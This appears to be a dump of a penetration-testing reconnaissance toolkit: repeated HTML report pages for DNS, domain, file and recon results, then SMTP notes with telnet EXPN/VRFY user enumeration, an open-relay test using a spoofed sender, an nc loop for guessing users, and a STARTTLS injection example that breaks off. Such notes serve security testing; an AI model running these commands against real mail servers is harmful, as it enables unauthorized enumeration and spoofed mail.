35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Black Listed</small></h2>
80 | 			<iframe src="../data/black-listed.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/traceroute.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li class="current"><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Traceroute</small></h2>
80 | 			<iframe src="../data/traceroute.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/active-recon.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li class="current"><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li class="current"><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Reports: <small class="lg-text">Active Recon</small></h2>
80 | 			<iframe src="../data/active-recon.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/config.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li class="current"><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 		          <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Config</small></h2>
80 | 		</div>
81 | 	</div>
82 | </div>
83 | 
84 | <center><iframe src="../data/config.htm" width="80%"></iframe></center>
85 | 
86 | </body>
87 | 
88 | </html>
89 | 
90 | 


--------------------------------------------------------------------------------
/report/pages/whois-domain.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li class="current"><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Whois Domain</small></h2>
80 | 			<iframe src="../data/whois-domain.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/zonetransfer.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li class="current"><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li class="current"><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">DNS: <small class="lg-text">Zone Transfer</small></h2>
80 | 			<iframe src="../data/zonetransfer.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/loadbalancing.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li class="current"><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li class="current"><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Loadbalancing</small></h2>
80 | 			<iframe src="../data/loadbalancing.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/passive-recon.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li class="current"><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li class="current"><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Reports: <small class="lg-text">Passive Recon</small></h2>
80 | 			<iframe src="../data/passive-recon.htm" width="100%"></iframe>
81 | 		</div>
82 | 	</div>
83 | </div>
84 | 
85 | </body>
86 | 
87 | </html>
88 | 
89 | 


--------------------------------------------------------------------------------
/report/pages/netcraft.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | 
 3 | <html>
 4 | 
 5 | <head>
 6 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
 7 | <title>Reporting Framework</title>
 8 | <link href='http://fonts.googleapis.com/css?family=Droid+Sans:400,700' rel='stylesheet' type='text/css'>
 9 | <link href="../css/defaults.css" rel="stylesheet" type="text/css" />
10 | <link rel="stylesheet" href="../css/style.css" type="text/css" />
11 | </head>
12 | 
13 | <body>
14 | 
15 | <div class="header nav">
16 | 	<div class="header-wrap container_12">
17 | 		<ul class="navbar">
18 | 			<li><a href="../index.htm">Home</a></li>
19 | 			<li><a href="#">Contacts</a>
20 | 			<ul>
21 |                     <li><a href="../pages/emails.htm">Emails</a></li>
22 | 			     <li><a href="../pages/names.htm">Names</a></li>
23 | 			</ul>         
24 | 			</li>
25 | 			<li><a href="#">DNS</a>
26 | 			<ul>
27 | 			     <li><a href="../pages/black-listed.htm">Black Listed</a></li>
28 | 			     <li><a href="../pages/config.htm">Config</a></li>
29 | 			     <li><a href="../pages/records.htm">Records</a></li>
30 | 			     <li><a href="../pages/subdomains.htm">Subdomains</a></li>
31 | 			     <li><a href="../pages/zonetransfer.htm">Zone Transfer</a></li>
32 | 			</ul>         
33 | 			</li>
34 | 
35 | 			<li class="current"><a href="#">Domain</a>
36 | 			<ul>
37 | 			     <li><a href="../pages/hosts.htm">Hosts</a></li>
38 |                     <li class="current"><a href="../pages/netcraft.htm">Netcraft</a></li>
39 | 			     <li><a href="../pages/squatting.htm">Squatting</a></li>
40 | 			     <li><a href="../pages/traceroute.htm">Traceroute</a></li>
41 | 			     <li><a href="../pages/whois-domain.htm">Whois Domain</a></li>
42 | 			     <li><a href="../pages/whois-ip.htm">Whois IP</a></li>
43 | 			</ul>         
44 | 			</li>
45 | 
46 | 			<li><a href="#">Files</a>
47 | 			<ul>
48 | 			     <li><a href="../pages/xls.htm">Excel</a></li>
49 | 			     <li><a href="../pages/pdf.htm">PDF</a></li>
50 | 			     <li><a href="../pages/ppt.htm">PowerPoint</a></li>
51 | 			     <li><a href="../pages/txt.htm">Text</a></li>
52 | 			     <li><a href="../pages/doc.htm">Word</a></li>
53 | 			</ul>         
54 | 			</li>
55 | 
56 | 			<li><a href="#">Reports</a>
57 | 			<ul>
58 | 			     <li><a href="../pages/active-recon.htm">Active Recon</a></li>
59 | 			     <li><a href="../pages/passive-recon.htm">Passive Recon</a></li>
60 | 			</ul>         
61 | 			</li>
62 | 
63 | 			<li><a href="#">Web</a>
64 | 			<ul>
65 | 			     <li><a href="../pages/loadbalancing.htm">Loadbalancing</a></li>
66 | 			     <li><a href="../pages/waf.htm">Web App FW</a></li>
67 | 			     <li><a href="../pages/whatweb.htm">Whatweb</a></li>
68 | 			</ul>         
69 | 			</li>
70 | 		</ul>
71 | 	</div>
72 | </div>
73 | 
74 | <div class="clear"></div>
75 | 
76 | <div class="wrapper">
77 | 	<div class="container_12">
78 | 		<div class="main-content">
79 | 			<h2 class="page-header">Domain: <small class="lg-text">Netcraft</small></h2>
80 | 		</div>
81 | 	</div>
82 | </div>
83 | 
84 | <center><img src="../images/netcraft.png"></center>
85 | <br>
86 | <center><img src="../images/netcraft2.png"></center>
87 | 
88 | </body>
89 | 
90 | </html>
91 | 
92 | 


--------------------------------------------------------------------------------
/notes/smtp.txt:
--------------------------------------------------------------------------------
 1 | SMTP
 2 | 
 3 | 
 4 | # SMTP relay, EXPN/VRFY command enabled
 5 | 
 6 | telnet <target IP> 25
 7 | 
 8 | EXPN root
 9 | VRFY root
10 | helo root
11 | 
12 | mail from: root@target.com
13 | rcpt to: jsmith@gmail.com
14 | DATA
15 | Subject: Testing open mail relay.
16 | Testing SMTP open mail relay. Have a nice day.
17 | .
18 | quit
19 | 
20 | for x in $(cat users.txt); do echo VRFY $x | nc -nv -w 1 <target IP> 25 2>/dev/null | grep ^’250’; done
21 | ------------------------------------------------------------------------------------------------------
22 | 
23 | sendEmail -f root@target.com -t jsmith@gmail.com -u Testing open mail relay. -m Testing SMTP open mail relay. Have a nice day. -s <target IP>
24 | 
25 | SMTP Service STARTTLS Plaintext Command Injection
26 | 
27 | telnet <target IP> 25
28 | S: <waits for connection on TCP port 25>
29 | C: <opens connection>
30 | S: 220 mail.target.com SMTP service ready
31 | C: EHLO mail.ietf.org
32 | S: 250-mail.target.com offers a warm hug of welcome
